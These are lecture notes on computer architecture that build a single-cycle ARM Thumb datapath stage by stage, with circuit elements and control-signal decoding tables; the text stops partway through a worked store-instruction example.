But to answer the question, the most general form for a program that does make sense as a sequential circuit (with input a, state bits x and y, and output z) is this:

x = y = 0;
forever {
    z = h(x, y);
    pause;
    x, y = f(x, y, a), g(x, y, a);
}

That contains an assignment that sets the output as a function of the values of the state variables, and following each clock edge a simultaneous assignment that sets new values for x and y based on their old values and the input. This denotes a Moore machine in which the next-state function is <f, g> where

<f, g>(x, y, a) = (f(x, y, a), g(x, y, a))

and the output function is h. The "forever/pause" loop (no nesting allowed) means "at each clock edge".

Other "programs" such as this:

x = y = 0;
forever {
    z = x;
    pause;
    if (a) x = !y; else y = x;
}

are to be re-construed in the simultaneous-assignment form shown above – in this case, by writing

x, y = (a ? !y : x), (a ? y : x);

so that if a is 1, then x gets set to !y and y is unchanged in each clock cycle, and if a is 0, the x is unchanged and y gets set to x. And we might design a shift register with y = x; x = a; meaning x, y = a, x; Anything that helps as a stepping stone towards the equivalent simultaneous assignment is encouraged.

If programs in this form help us to think of the behaviour as a program and reduce it to a simultaneous assignment, then they have served their purpose.

Aren't sequential circuits equivalent to finite-state automata?

Yes, they are: a sequential circuit containing n flip-flops has a set of states with 2n elements (not all of them necessarily accessible), and the combinational logic that computes the next state from the current state and inputs amounts to the transition function of what the Models of Computation course calls a deterministic finite automaton (DFA). Conversely, given any DFA with at most 2n states, we can number the states with binary numerals of n bits each, and the transition function of the automaton then becomes n boolean functions for the next value of each bit, which we know can be implemented in combinational logic.

This gives a systematic but somewhat soul-destroying way of designing a sequential circuit to solve a problem: we first solve the problem with a DFA, then laboriously tabulate all the state transitions that the DFA can make, choose a binary numbering of its states, and design combinational logic to implement the next-state function. The size and regularity of the combinational logic will depend on the numbering of states that is chosen in a way that is imponderable unless we can exploit a lucky insight. This approach tends to minimise the number of bits of state that are used, sometimes at the expense of seeing the problem in a regular or symmetric way, so that it can happen that the smaller number of state bits comes at the expense of vastly more complicated and obscure combinational logic.

Our approach will be different: we will rarely have to design a sequential circuit for an arbitrary finite automaton, and we need not care about minimising the number of states if using a few more states makes the circuit easier to understand. Thus, we might design a pulse-shaping circuit by observing that the output depends in a simple way on the last three (say) bits of input, and design a circuit that saves them in three flip-flops configured as a shift register. It matters little that there is another solution that uses only two flip-flops to distinguish four different states but has combinational logic that must be designed by calculation rather than insight.

Lecture 21 – Architectural elements

Circuits for arithmetic. Multiplexers. Register files. Arithmetic-Logic Unit. Barrel shifter.

Circuits for arithmetic

The XOR gate is very useful for arithmetic circuits.

XOR gate with implementation
XOR
a b z
0 0 0
0 1 1
1 0 1
1 1 0

Though we could make it out of NAND gates (e.g., using the neat circuit shown above), there's a clever implementation using pass transistors that is more economical in space and time.

An XOR gate and an AND gate together make a 'half-adder' that adds two bits, giving a sum and a carry output.

Half adder
Half adder
a b c s
0 0 0 0
0 1 0 1
1 0 0 1
1 1 1 0

A 'full adder' accepts a carry input as well as producing a carry output. We can either make it from two half-adders and an OR gate, or we can design in from scratch, using a 3-input XOR gate for the sum and a majority gate for the carry.

Full adder

The classic 'ripple-carry' adder uses a chain of full adders to add two binary numbers.

Ripple-carry adder

The big problem with this circuit is the very long critical path caused by the carry chain. It's possible to do better than this, using more hardware (but still an amount proportional to n) to produce an n-bit sum in log n time.

[A subtracter a - b can be made from an adder by complementing b bitwise and setting the carry-in to 1. For a circuit that can both add and subtract, use a row of XOR gates controlled, like the carry-in, by a signal set to 0 for add and 1 for subtract.

Decoder and multiplexer

A two-way, one-bit multiplexer.

Two-way multiplexer

An 8-way decoder.

3-to-8 decoder

An n-way multiplexer

Multiplexer

(Replicate all but the decoder for a multi-bit multiplexer.)

A ROM with 8 single-bit locations

Read-only memory

An 8x8 ROM (bigger sizes are available)

Read-only memory 8x8

Programmable logic

Viewed at a higher level of abstraction, a sequential circuit consists of a number of state-bearing elements that we can model as a row of flip-flops, together with a Boolean function that derives the output and the next state from the input and current state.

Sequential circuit

Rather than implementing the combinational logic with some carefully-crafted arrangement of logic gates, we can consider replacing it with a lookup table implemented as a ROM. This has several advantages:

  • designing logic circuits is difficult to do by hand.
  • for larger design, regularity – leading to easier chip layout – is more important than minimising the number of gates.
  • for prototyping and small scale production, chip count is more important than gate count. (That's why we would use a microcontroller where it gives sufficient performance.)
  • time to market, inventory size, and flexibility all militate for board designs that are independent of detailed function.

So programmable logic devices are the way to go.

We can formulate an adequacy argument for sequential circuits using the general scheme shown above. Taking any (deterministic) finite-state machine, we can label each state with a different string of bits, by numbering them in binary or otherwise, and also encode the inputs and outputs of the machine as bit-strings. Then the next-state function becomes a somewhat complicated function from bit-strings to bit-strings, which we know can be implemented in combinational logic.

Register

A multi-bit register with write enable.

n-bit register

A fully synchronous alternative.

Fully synchronous register

Register file

A basic, twin-port register file.

Register file

The ARM register file, with special features.

ARM register file

Arithmetic-logic unit

A simple ALU.

Arithmetic-logic unit

Barrel shifter

We can make a circuit that can shift left by any distance by taking the shift amount bit by bit, combining in sequence circuits that can shift by 16, 8, 4, 2, 1. Here's a picture of a three-stage shifter that can shift an 8-bit quantity left by any amount from 0 to 7:

Barrel shifter

(I'm not quite sure why this circuit is called a 'barrel' shifter, but I like to imagine the extreme sport where people try to balance on top of a floating barrel by taking large or small steps to left or right.)

That shifter was only able to implement logical-shift-left (lsl). For right shifts (lsr and asr) and rotations (ror), replace the two-way MUXes with five-way MUXes, feeding the three extra inputs of each MUX in stage k with the relevant bits of x LSR 2k or x ASR 2k or x ROR 2k.

The ARM datapath's shifter also produces a Boolean signal that is the last bit shifted out; it's not hard to add that as an extra output, with each stage overriding the signal produced by previous stages.

Lecture 22 – Designing a datapath

The plan now is to put together the elements we have studied into a simple datapath that can execute Thumb instructions. We'll do it in stages, adding at each stage just sufficient logic to implement a few more instructions. The design we make will be seriously unrealistic, in that all the work of executing an instruction will be performed inside a single clock cycle: this will lead to longer combinational paths than we would like, and so require a lower clock speed. A more practical design would use pipelining to overlap the execution of each instruction with preparation for the next one. You can study pipelining and the design questions it raises in next year's course on Computer Architecture. For now, we must be content with the observation that if we wanted a pipelined implementation of the Thumb architecture, then effort spent on this single-cycle implementation would not be wasted, because a pipelined design starts with a single-cycle design, drawing lines across the circuit to separate what happens for a particular instruction in this clock cycle from what happens in the next.

The design is shown in these notes by means of a sequence of circuit diagrams, each accompanied by a selection of settings for the control signals that correspond to instructions that the circuit is capable of executing. The final design is also represented by a register-level simulator written in C. The simulator contains tables that decode all the instructions it implements, and is capable of loading and executing binary images prepared using the standard Thumb tools.

  • The handout for this lecture and the next one is provided as a separate, printable document. The content is the same, but the presentation has been edited for printing.
  • Source code for the simulator is available as part of the (utterly optional) Lab five.
  • An annotated listing of the simulator is also provided as a PDF document.

Stage 1: Instruction fetch

The first stage is to arrange to fetch a stream of instructions from memory, and decode them into control signals that will drive the rest of the datapath. For this, let's install a program counter PC, a register that will, on each clock cycle, feed the address of the current instruction to a memory unit IMem so that it fetches a 16-bit instruction. There's also a simplified adder that increments the PC value by 2 and feeds it back into the PC as the address of the next instruction. Some of the 16 bits of the instruction are fed into a combinational circuit that decodes it, producing a bundle of control signals that are fed to the functional units in the datapath. Since those functional units and their connections are yet to be added, we can't say precisely what the control signals are at this stage; but let's add wiring that makes both the control signals and the remaining bits of the instruction (those that have not been accounted for in the encoding) available to each part of the datapath. We can imagine building the decoder from a ROM or (as we'll see later) several ROMs that decode different parts of the instruction.

Stage 1: Instruction fetch

This design is capable of implementing only straight-line programs with no branching, because there is no way to avoid a sequence of PC values that goes 0, 2, 4, 6, ... Also, this design doesn't reflect the fact that instructions can access the PC alongside the other 15 registers. We'll adjust the design later to correct both these infelicities.

Stage 2: ALU operations

Now let's add some datapath components: a simple register file and an ALU. The twin-port register file is capable of reading the values of two registers and writing a result to a third register, all in the same clock cycle. We can imagine for now that the three registers are selected by fixed fields in the instruction, as they are in the add reg instruction:

Adds-rrr format.png

In executing this instruction, the two registers that are read are selected by fields instr<5:3> and instr<8:6> of the instruction. The control unit must ask the ALU to add its two inputs, producing a result that is fed back to the register file. The control unit also tells the register file to write the result back into the register selected by instr<2:0>.

Stage 2: ALU operations

The same datapath could be used to implement other instructions that perform arithmetic on registers: the three-register form of sub, certainly:

Subs-rrr format.png

For this instruction, we need to tell the ALU to subtract rather than add. But we can also implement instructions like ands that specify two registers and overwrite one of their operands:

Ands-rr format.png

This instruction is a bit different, because the ALU must do a bitwise and operation, but also the three registers are selected by different fields of the instruction, with instr<2:0> used to select both one of the inputs and the output of the instruction. Let's leave aside for a while these issues of detail in decoding, and concentrate instead on what features are needed in the datapath itself.

Stage 3: Immediate operands

In addition to instructions that perform ALU operations with the operands taken from registers, there are also instructions that take the second operand from a field in the instruction. Examples of this are two forms of the add instruction:

Adds-rri format.png
Adds-ri format.png

We can also cover the immediate form of the mov instruction, if we allow an ALU operation that simply copies the second operand and ignores the first.

Movs-ri format.png

To accommodate these, we can introduce a multiplexer on the second input of the ALU, fed both from the second register value rb and from appropriate fields of the instruction. The examples above show that it must provide the option of selecting both instr<8:6> and instr<7:0>, and there are other possibilities we will discover as we proceed.

Stage 3: Immediate operands

Now we have a few control signals, we can start to make a table showing how they should be set to carry out various instructions.

Instruction cRand2 cAluOp cRegWrite
adds r RegB Add T
adds i3 Imm3 Add T
adds i8 Imm8 Add T
subs r RegB Sub T
subs i3 Imm3 Sub T
subs i8 Imm8 Sub T
ands r RegB And T
movs r RegB Mov T
movs i8 Imm8 Mov T

This table will expand as we get further, adding more rows to provide more instructions, but also more columns to control the extra hardware we will need to implement them. There will always be settings for any added control signals that make the new hardware do nothing, so that we can still get the effect of these early instructions unchanged. We've still to deal with the issue of what registers are selected to take part in the instructions, and we have also yet to provide for the fact these instructions all set the condition codes. And so far, all instructions write their result into a register: that will change too.

Stage 4: Data memory

Now let's add a second interface to memory, so that we can implement load and store instructions. We'll use what's called a modified Harvard architecture, meaning that the data memory will be treated separately from the instruction memory. They could be separate memories, as on some microcontrollers like the AVR used in the Arduino, or we could imagine having two independent caches in front of the same memory, and modelling just the things that happen when there is a cache hit all the time, not the periods of suspended animation when the processor core is waiting for a memory transaction to complete. Either way, this is different from the von Neumann architecture of ARM's Cortex-M0 implementation, where there is one memory interface, and loads and stores are executed in an extra cycle between instruction fetches.

The Thumb instruction set provides instructions like ldr r0, [r1, r2] and str r0, [r1, r2] that form an address by adding the contents of two registers r1 and r2, and either load a memory word and save it in a third register r0, or take a value from r0 and store it.

Ldr-rrr format.png
Str-rrr format.png

We should notice two requirements for the datapath: first, that we need to form addresses by adding, and second, that the str instruction here reads not two but all three of the registers named in the instruction. We can use the existing ALU to do the address calculation, and we can easily enhance the register file with an extra mux so that it outputs the current value of all three registers named in the instruction. If the third register value isn't needed (as in all instructions except a store) then it costs nothing to compute it anyway.

Stage 4: Data memory

In addition to the third register value rc, the diagram shows two further architectural elements. There's the data memory DMem, with two data inputs, one data output and two control inputs, both single bits. The two data inputs are an address, taken from the ALU output, and a value to be stored, taken from rc. The data output is a value memout that has been loaded from memory, and this together with aluout feeds a new mux that determines the result of the instruction. The two control inputs for the memory are cMemRd and cMemWr, telling it whether to conduct a read cycle, a write cycle, or (if the instruction is not a load or store) neither. Writing when we don't want to write is obviously harmful, and reading unnecessarily might also be harmful if it causes a cache miss, or an exception for an invalid address. The result mux can be controlled by the same cMemRd signal, so that the result of the instruction is memout for load instructions and aluout for everything else.

Let's enhance the decoding table to cover these two new instructions. I'll keep just a few of the existing instructions, extending the lines for them to include values for cMemRd = cMemWr = F that maintain the same function as before; the other instructions can be extended in the same way. I've added entries for the ldr and str with the reg+reg addressing mode. Note that str is the first instruction that doesn't write its result back to a register. There will be others, so while it was tempting before to suppose cRegWrite = T always, and it's tempting now to suppose cRegWrite = !cMemWr, we will see later that neither of these are true.

Instruction cRand2 cAluOp cMemRd cMemWr cRegWrite
adds r RegB Add F F T
movs i8 Imm8 Mov F F T
ldr r RegB Add T F T
str r RegB Add F T F

Stage 5: Barrel shifter

As the next step, let's add a barrel shifter to the datapath, so that we can implement shift instructions like the following.

Lsls-rri format.png
Rors-rr format.png

We could make a barrel shifter part of the ALU, so that left and right shifts were added to the list of ALU operations; or failing that, we could put the shifter 'in parallel' with the ALU, feeding its output together with those of the ALU and the data memory into the result mux. That would allow us to implement the shift instructions OK, but it would be less versatile. We can take a glance at big-ARM instructions like

ldr r0, [r1, r2, LSL #2].

This shifts left by 2 bits the value of r2, adds that to the value of r1 to form an address, loads from that address, and puts the result in r0, all in one instruction. This is really useful if r1 contains the base address of an array and r2 contains an index into the array. Sadly, Thumb code doesn't have a way to encode all that in one instruction. We can provide for such operations by adding a barrel shifter in front of the ALU, operating on the value that will become the ALU's second input, as shown in the figure. There is a control signal to set the operation – Lsl, Lsr, Asr or Ror – to be performed by the shifter. There's also a mux that lets us choose the shift amount, either a constant like 0 or 2 (Sh0 or Sh2), or an immediate field of the instruction (ShImm), or a value taken from the first register ra read by the instruction (ShReg).

Stage 5: Barrel shifter

There are two new control signals, cShiftOp and cShiftAmt. Existing instructions will continue to work if we set cShiftOp = Lsl and cShiftAmt = Sh0, representing the constant 0. We can make good use of the shifter in implementing load and store instructions with the reg+imm addressing mode, because it is specified that the offset should be multiplied by 4 in such instructions, and we can get the shifter to do the multiplication.

Ldr-rri format.png
Str-rri format.png

Here are control signals for some existing instructions, plus the two shift instructions and the reg+imm forms of ldr and str.

Instruction cRand2 cShiftOp cShiftAmt cAluOp cMemRd cMemWr cRegWrite
adds r RegB Lsl Sh0 Add F F T
movs i8 Imm8 Lsl Sh0 Mov F F T
ldr r RegB Lsl Sh0 Add T F T
str r RegB Lsl Sh0 Add F T F
lsls i5 RegB Lsl ShImm Mov F F T
rors r RegB Ror ShReg Mov F F T
ldr i5 Imm5 Lsl Sh2 Add T F T
str i5 Imm5 Lsl Sh2 Add F T F

The disadvantage of putting the barrel shifter 'in series' with the ALU is that it lengthens the combinational paths, one of which now stretches from the register file, through shifter, ALU and data memory, back to the register file. The long path will slow the maximum clock rate that can be supported by the machine.

Questions

What's the difference between decoded, derived and dynamic signals?

Decoded signals are those that appear in the decoding tables and are determined by the instruction's opcode; derived signals also depend on other parts of the instruction halfword, and dynamic signals depend on other parts of the machine state.

  • The decoded signals will be the same in every instance of an instruction – that it to say, two instructions that share the same opcode will have the same decoded signals. Note, however, that two instructions like mov r and mov i8 may share the same mnemonic in assembly language, but have different opcodes, and so be treated as different instructions by the hardware, with different decoded signals. In the simulator, these decoded signals form the members of the Control structure ctrl contained in one of the decoding tables, and have names like ctrl->cShiftAmt.
  • The derived signals will be the same whenever a particular instruction is executed, because they are determined by the bits of the instruction taken all together; for example, the instruction add r3, r1, r2 always writes its result to register r3, and so has cRegC = 3. In the simulator, these derived signals are outside the Control structure, but also have names like cRegC that start with a lower-case c followed by an upper-case letter.
  • The dynamic signals differ from one execution of the instruction to another, so that at one time that add instruction could write 7 to r3, and another time it could write 8, and the value of the result signal would be different in the two cases.

In the lectures, you talk about processor designs containing lots of multiplexers, but some books talk about designs containing various busses. What's the difference?

There isn't really a difference: a bus in a conventional design is a bundle of wires that can be driven by several sources at different times, usually by setting one source to produce an output and the others to enter a high-impedance state. If there is a difference, it is that we are neutral about the technology used to implement a multiplexer – logic gates, or the kind of three-state logic just described – whereas a bus, especially if it stretches between chips, has a specific implementation that must be followed.

Lecture 23 – Designing a datapath (continued)

Continuation This lecture continues the story begun in the previous lecture. We rearrange the datapath slightly, and add more elements that implement a bigger subset of the Thumb instruction set. The theme shifts slightly from providing the datapath elements needed to perform operations on data to implementing the control elements concerned with the detail of decoding instructions and controlling the flow of execution, including conditional branches and subroutine calls.

Stage 6: PC as a register

Up to now, we have kept the PC separate from the general register files, as indeed it is on some architectures. But on the ARM, the PC can be accessed like other registers, and used in PC-relative addressing. So our next step is to merge the PC into the register file, using a design for a 'turbocharged' register file we prepared earlier.

Stage 6: Turbocharged register file

In addition to the three selectable outputs that can output the value of any register (including the PC), there is now a special-purpose output that always carries the (current) PC value. There is also a separate input that receives the value of PC+2, which will be written to the PC if it is not specifically selected for the writing of a different value: this allows for the implementation of branch instructions at a later point. We'll assume that the design of the register file includes an adjustment so that, when the PC is read as an ordinary register, the specified value PC+4 is output.

Stage 7: Instruction decoding

We've got quite a good table of control signals now, so it's time to fill in more details of the decoding process. Each instruction uses up to three registers, sometimes selected by fields in the instruction, and sometimes fixed as SP or LR or PC. To sort this out, we can add three identical multiplexers, driven by control signals cRegSelA, cRegSelB, cRegSelC, that either select one of a list of fields (Rx, Ry, Rz, Rw) from the instruction or give a fixed value (Rsp, Rlr, Rpc).

Stage 7: Instruction decoding

The other addition in this figure is a unit called alusel. This tidies up a couple of instructions where the ALU operation could be add or subtract, but the decision is not determined by the first few bits of the instruction. One pair of such instructions are the ones that add or subtract a constant from the stack pointer, using instr<7> to decide which.

Add-spi format.png
Sub-spi format.png

The other such pair are the forms add/sub r/i3 shown earlier that use bit instr<10> to decide whether the second operand is a register or a 3-bit immediate field, and use instr<9> to decide between adding and subtracting. The alusel decoder sorts out the details, and the details can be found in the code of the simulator.

Let's refresh the table of control signals, adding the three register selectors, and also adding at the left a column that shows the leftmost bits of the instruction, always bits instr<15:11> and sometimes further bits. We'll do that for our selection of example instructions first.

Instruction opcode cRegSelA cRegSelB cRegSelC cRand2 cShiftOp cShiftAmt cAluSel cMemRd cMemWr cRegWrite
adds/subs r/i3 00011 Ry Rz Rx RImm3 Lsl Sh0 Sg9 F F T
movs i8 00100 - - Rw Imm8 Lsl Sh0 Mov F F T
ldr r 01011 Ry Rz Rx RegB Lsl Sh0 Add T F T
str r 01010 Ry Rz Rx RegB Lsl Sh0 Add F T F
lsls i5 00000 - Ry Rx RegB Lsl ShImm Mov F F T
ands r 01000:00000 Rx Ry Rx RegB Lsl Sh0 And F F T
rors r 01000:00111 Ry Rx Rx RegB Ror ShReg Mov F F T
ldr i5 01101 Ry - Rx Imm5 Lsl Sh2 Add T F T
str i5 01100 Ry - Rx Imm5 Lsl Sh2 Add F T F

This is a fair selection of instructions for the machine, especially if we let ands stand as an example of register-to-register ALU operations and rors stand as an example of shifts with the shift amount taken from a register. Most instructions can be identified from their first five bits and set out in a table of 32 possibilities. Among those implemented in the simulator, most of the rest start with 010000 or 010001, and can be identified using two further, smaller tables. All these tables could become ROMs in a hardware implementation. This part of a Thumb implementation is more complicated than is typical for RISC machines because of the variety of instruction formats. For comparison, the MIPS has just three instruction formats, all 32 bits long: one that names three registers, one that has two registers and a 16-bit immediate field, and a third format with a large offset for subroutine calls.

The datapath as it stands also contains the resources to implement a number of other instructions. For example, there is are several instructions that implicitly involve the stack pointer, including the two shown above, an instruction that forms an address by adding a constant and the stack pointer, and instructions that load and store from that address.

Add-rspi format.png
Ldr-rspi format.png
Str-rspi format.png

All of these can be implemented using the register selector Rsp:

Instruction opcode cRegSelA cRegSelB cRegSelC cRand2 cShiftOp cShiftAmt cAluSel cMemRd cMemWr cRegWrite
add/sub sp 10110 Rsp - Rsp Imm7 Lsl Sh2 Sg7 F F T
add rsp 10101 Rsp - Rw Imm8 Lsl Sh2 Add F F T
ldr sp 10011 Rsp - Rw Imm8 Lsl Sh2 Add T F T
str sp 10010 Rsp - Rw Imm8 Lsl Sh2 Add F T F

We can also implement unconditional branches that add a signed 11-bit constant to the PC.

Instruction opcode cRegSelA cRegSelB cRegSelC cRand2 cShiftOp cShiftAmt cAluSel cMemRd cMemWr cRegWrite
b 11100 Rpc - Rpc SImm11 Lsl Sh1 Add F F T

As you can see, the displacement is multiplied by 2 before adding it to the PC. This implementation depends on two features of the register file: that the PC reads as PC+4 when accessed as a numbered register, and that writing the PC explicitly takes precedence over the usual update with nextpc = pc+2.

Stage 8: Subroutine calls

In order to implement the branch-and-link instructions bl and blx, we need one extra feature of the register file, and one small enhancement to the datapath. The register file has one further control input cLink that, when active, causes the nextpc value to be written to the link register LR, in addition to the normal updating of registers. This will permit us to implement an instruction that simultaneously sets the link register to a return address while loading the entry point of a subroutine into the PC.

Because the bx r and blx r instructions differ in only one bit, we need an extra multiplexer to derive this control signal, with three settings – 0 for most instructions, 1 for the bl2 instruction (see below), and a copy of instr<7> for these instructions.

Bx-r format.png
Blx-r format.png

The three values of the controlling cWLink control signal are denoted N, Y and C in the tables below.

Stage 8: Subroutine calls

Existing instructions are extended with cWLink = N, and the following rule covers the two branch-to-register instructions. The Ryy register selector denotes the four-bit field Instr<6:3>; high registers are allowed here, as in the familiar instruction bx lr.

Instruction opcode cRegSelA cRegSelB cRegSelC cRand2 cShiftOp cShiftAmt cAluSel cMemRd cMemWr cRegWrite cWLink
bx/blx r 01000:111 - Ryy Rpc RegB Lsl Sh0 Mov F F T C

As hinted in an earlier problem sheet, the 32-bit bl instruction can, in simple cases, be executed in two halves that we shall call bl1 and bl2.

Bl1 format.png
Bl2 format.png

The first half starts with bits 11110, and the second half starts with 11111, provided we assume bits J1 and J2 are both 1, as traditionally they were: only very long branches will make them anything else. We will implement the bl1 instruction by adding the offset, scaled appropriately, to the PC and putting the result in LR; then we implement bl2 by adding the second half of the offset to the LR, and putting the result in the PC, simultaneously setting LR to the return address.

Instruction opcode cRegSelA cRegSelB cRegSelC cRand2 cShiftOp cShiftAmt cAluSel cMemRd cMemWr cRegWrite cWLink
bl1 11110 Rpc - Rlr SImm11 Lsl Sh12 Add F F T N
bl2 11111 Rlr - Rpc Imm11 Lsl Sh1 Add F F T Y

Stage 9: Conditional execution

There are several features of the Thumb instruction set that we're not going to implement, but one remains that is essential to writing working programs, and that is the mechanism for conditional branches: arithmetic instructions set the status bits NZCV, and there is a form of branch instruction that contains one of 14 conditions defined as logical combinations of the status bits.

Bcond format.png

Our approach to implementing conditional branches will be to use the ALU to compute the target address of the branch from the PC value and the displacement, but to make the writing of the result into the PC conditional on the test being passed. Three new datapath elements and two new control signals will be needed. There is a small, 4-bit register to hold the NZCV flags, and a control signal that determines whether the flags are updated by each instruction. A separate, combinational circuit takes the register contents and the four-bit condition field shown in the instruction format, and computes a signal enable that indicates whether the condition is satisfied. (As usual, this circuit functions in every instruction, whether it is a conditional branch or not, and produces a nonsense output except when a conditional branch is in progress.) The decision whether to write the result of an instruction back to a register becomes a dynamic one: in place of the signal cRegWrite appearing in the decoding table, there is a signal cWReg that takes values Y, N and C, with C denoting that the cRegWrite signal is taken from cEnabled.

Stage 9: Conditional execution

We can add the new signals to the table for existing instructions: cWFlags indicates whether the instruction should write the flags or not: T for adds and lsls and all the other arithmetic and logical instructions, F for loads and stores and branches. The values T and F for cRegWrite are replaced by values Y and N for cWReg, with C used only in the following rule for conditional branch instructions.

Instruction opcode cRegSelA cRegSelB cRegSelC cRand2 cShiftOp cShiftAmt cAluSel cMemRd cMemWr cWFlags cWReg cWLink
b<c> 11010
11011
Rpc - Rpc SImm8 Lsl Sh1 Add F F F C N
cmp ri 00101 Rw - - Imm8 Lsl Sh0 Sub F F T N N
subs ri 00111 Rw - Rw Imm8 Lsl Sh0 Sub F F T Y N

For comparison, the rules for subs ri and cmp ri are also given here: the only difference between them is that after the subtraction is performed, the subs instruction writes a register as well as updating the flags, and the cmp instruction just updates the flags. It's important to note that conditional branches read but don't destroy the flags: that makes it possible to have one compare instruction followed by several branches conditional on its result:

    cmp r1, #0
    beq zero
    bgt positive
negative:
    ...

Context

None of the detail here really matters, except as an illustration of the challenges faced by a datapath designer. The hardware, once designed, is fixed, and must be designed so that, with appropriate settings of the control signals, every machine language instruction can be implemented. For a single-cycle design like this one, where each instruction takes exactly one clock cycle, the instruction decoder essentially expands each instruction into a long string of control bits, reversing a kind of compression that makes some useful operations expressible in the limited number of instruction bits, and others not expressible at all.

Summary of control signals

We can distinguish between decoded signals, which are determined by the opcode as looked up in the ROM, and therefore the same for all instances of an instruction, derived signals, which are the same for every execution of a particular instruction, and dynamic signals, which will differ from one execution of an instruction to the next.

Decoded Derived Dynamic Description
pc Program counter value
instr The 16-bit instruction
cRegSelA, cRegSelB, cRegSelC Three rules for selecting registers
cRegA, cRegB, cRegC The three register numbers
ra, rb, rc The contents of the three registers
nextpc Address of the next instruction
cRand2 Rule for selecting shifter input
shiftin Input to the shifter
cShiftOp Shift operation
cShiftAmt Rule for determining shift amount
shiftamt Amount of shift
aluin2, shcarry Outputs from the shifter
cAluSel Rule for determining ALU operations
cAluOp The ALU operation
aluout, newflags Outputs from the ALU
cMemRd, cMemWr Whether to read or write the memory
memout Result of memory read
result Result for write-back
cWFlags Whether to update the flags
cCond Condition to test
enable Whether the condition is satisfied
cWReg Rule for writing result register
regwrite Whether result will be written
cWLink Rule for updating link register
cLink Whether link register will updated

Questions

What's the difference between decoded, derived and dynamic signals?

Decoded signals are those that appear in the decoding tables and are determined by the instruction's opcode; derived signals also depend on other parts of the instruction halfword, and dynamic signals depend on other parts of the machine state.

  • The decoded signals will be the same in every instance of an instruction – that it to say, two instructions that share the same opcode will have the same decoded signals. Note, however, that two instructions like mov r and mov i8 may share the same mnemonic in assembly language, but have different opcodes, and so be treated as different instructions by the hardware, with different decoded signals. In the simulator, these decoded signals form the members of the Control structure ctrl contained in one of the decoding tables, and have names like ctrl->cShiftAmt.
  • The derived signals will be the same whenever a particular instruction is executed, because they are determined by the bits of the instruction taken all together; for example, the instruction add r3, r1, r2 always writes its result to register r3, and so has cRegC = 3. In the simulator, these derived signals are outside the Control structure, but also have names like cRegC that start with a lower-case c followed by an upper-case letter.
  • The dynamic signals differ from one execution of the instruction to another, so that at one time that add instruction could write 7 to r3, and another time it could write 8, and the value of the result signal would be different in the two cases.

In the lectures, you talk about processor designs containing lots of multiplexers, but some books talk about designs containing various busses. What's the difference?

There isn't really a difference: a bus in a conventional design is a bundle of wires that can be driven by several sources at different times, usually by setting one source to produce an output and the others to enter a high-impedance state. If there is a difference, it is that we are neutral about the technology used to implement a multiplexer – logic gates, or the kind of three-state logic just described – whereas a bus, especially if it stretches between chips, has a specific implementation that must be followed.

Lecture 24 – Three instructions

Using the datapath to implement three typical instructions.


Decoding instructions

Opcode Bits Instruction
15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
0–2 0 0 0 Op Imm5 Ry Rx Move shifted register
3 0 0 0 1 1 I Op Rz/Imm3 Ry Rx Add/Subtract
4–7 0 0 1 Op Rw Imm8 Move/Compare/Add/Subtract immediate
8a 0 1 0 0 0 0 Op Ry Rx ALU operations
8b 0 1 0 0 0 1 Op X Ryy Rxx Hi register ops, branches
9 0 1 0 0 1 Rw Imm8 PC-relative load
10–11 0 1 0 1 L 0 0 Rz Ry Rx Load/store with reg offset
12–13 0 1 1 0 L Imm5 Ry Rx Load/store with immed offset
18–19 1 0 0 1 L Rw Imm8 SP-relative load/store
20–21 1 0 1 0 SP Rw Imm8 Load address
22 1 0 1 1 0 0 0 0 S Imm7 Add offset to SP
26–27 1 1 0 1 Cond Disp8 Conditional branch
28 1 1 1 0 0 Disp11 Unconditional branch
30–31 1 1 1 1 H Disp11 Long branch and link

ARM documentation is inconsistent about the naming of register fields, but here we give a different name to each field in the 16-bit instruction that might name a register:

  • Rx = instr<2:0>
  • Ry = instr<5:3>
  • Rz = instr<8:6>
  • Rw = instr<10:8>
  • Ryy = instr<6:3>
  • Rxx = instr<7>:instr<2:0>

Implementing three instructions

adds r1, r2, r3

This instruction adds together the contents of registers r2 and r3, and puts the result in r1, setting the NZCV flags from the result. According to the architecture manual, the format of the machine instruction is as follows:

Adds-rrr format.png

Here Rx is the destination register, Ry is the first register operand, and Rz is the second. So the example instruction adds r1, r2, r3 in machine code is

00011 00 011 010 001

I've separated the five-bit opcode 00011 which will be the index 3 for the instruction in the main decoding ROM. Comparing the remaining two fixed bits in the encoding with those for other instructions like "subtract register" and "add immediate", we can see that one of these bits selects add rather than subtract, and the other denotes the fact that the second operand comes from a register rather than an immediate field of the instruction. We will deal with these aspects later.

The first item in the order of business is to select the correct three registers for reading and writing by establishing values for the control signals cRegSelA, cRegSelB and cRegSelC. These are set to values that denote the three fields [5:3], [8:6] and [2:0] of the instruction.

cRegSelA = Ry
cRegSelB = Rz
cRegSelC = Rx

The hardware will read all three of these registers as the values ra, rb and rc, though we will not use the value of rc in the rest of the instruction. It's cheaper to do this than to stop it happening.

Next, the input to the shifter is taken from rb, so we must set cRand2 appropriately. But note that there is another instruction adds i3 that uses an immediate field instead, and the difference between them is bit 10 of the instruction – 0 for the register and 1 for the immediate. There's a value for the cRand2 control signal that selects this rule, making the shifter input be the register value or the immediate field according to bit 10 of the instruction.

cRand2 = RImm3

This adds instruction does not use the shifter – or rather it does, but requires the shifter to pass through the register value unchanged. So we set the shifter to do a left shift as a default, and peg the shift amount as zero.

cShiftOp = Lsl
cShiftAmt = Sh0

We want the ALU to add the two register values, but notice that there's another instruction that has a 1 in bit 9 and subtracts instead. So we want a rule for the ALU operation that reflects this.

cAluOp = Bit9

The instruction writes the flags, but does not perform a read or write operation on the memory, so that the result of the instruction is the ALU output.

cFlags = True
cMemRd = False
cMemWr = False

Unlike the special instructions for subroutine call, this one does not write the lr register with the address of the next instruction, but it does write the result back into the register selected by cRegC.

cLink = N
cRegWrite = Y

(These are values of type Perhaps = Y | N | C because some instructions make the effect conditional on other signals.)

The bundle of control signals is now complete, and we can summarise it in a single row of the decoding table:

--    cRegA                  cShiftOp      cFlags   cLink
--     |   cRegB      cRand2  |   cShiftAmt | cMemRd | cRegWrite
--     |    |   cRegC  |      |    | cAluOp |  | cMemWr |  mnem     
--     |    |    |     |      |    |    |   |  |  |  |  |   |
3  -> (Ry,  Rz,  Rx,  RImm3, Lsl, S0, Bit9, T, F, F, N, Y, "adds/subs")

str r0, [sp, #48]

This instruction stores the value from r0 into a 4-byte location whose address is at offset 48 from the stack pointer sp. The Architecture Manual shows that the register r0 is specified using field [10:8] of the instruction, and the offset is an 8-bit immediate field.

Str-sp format.png

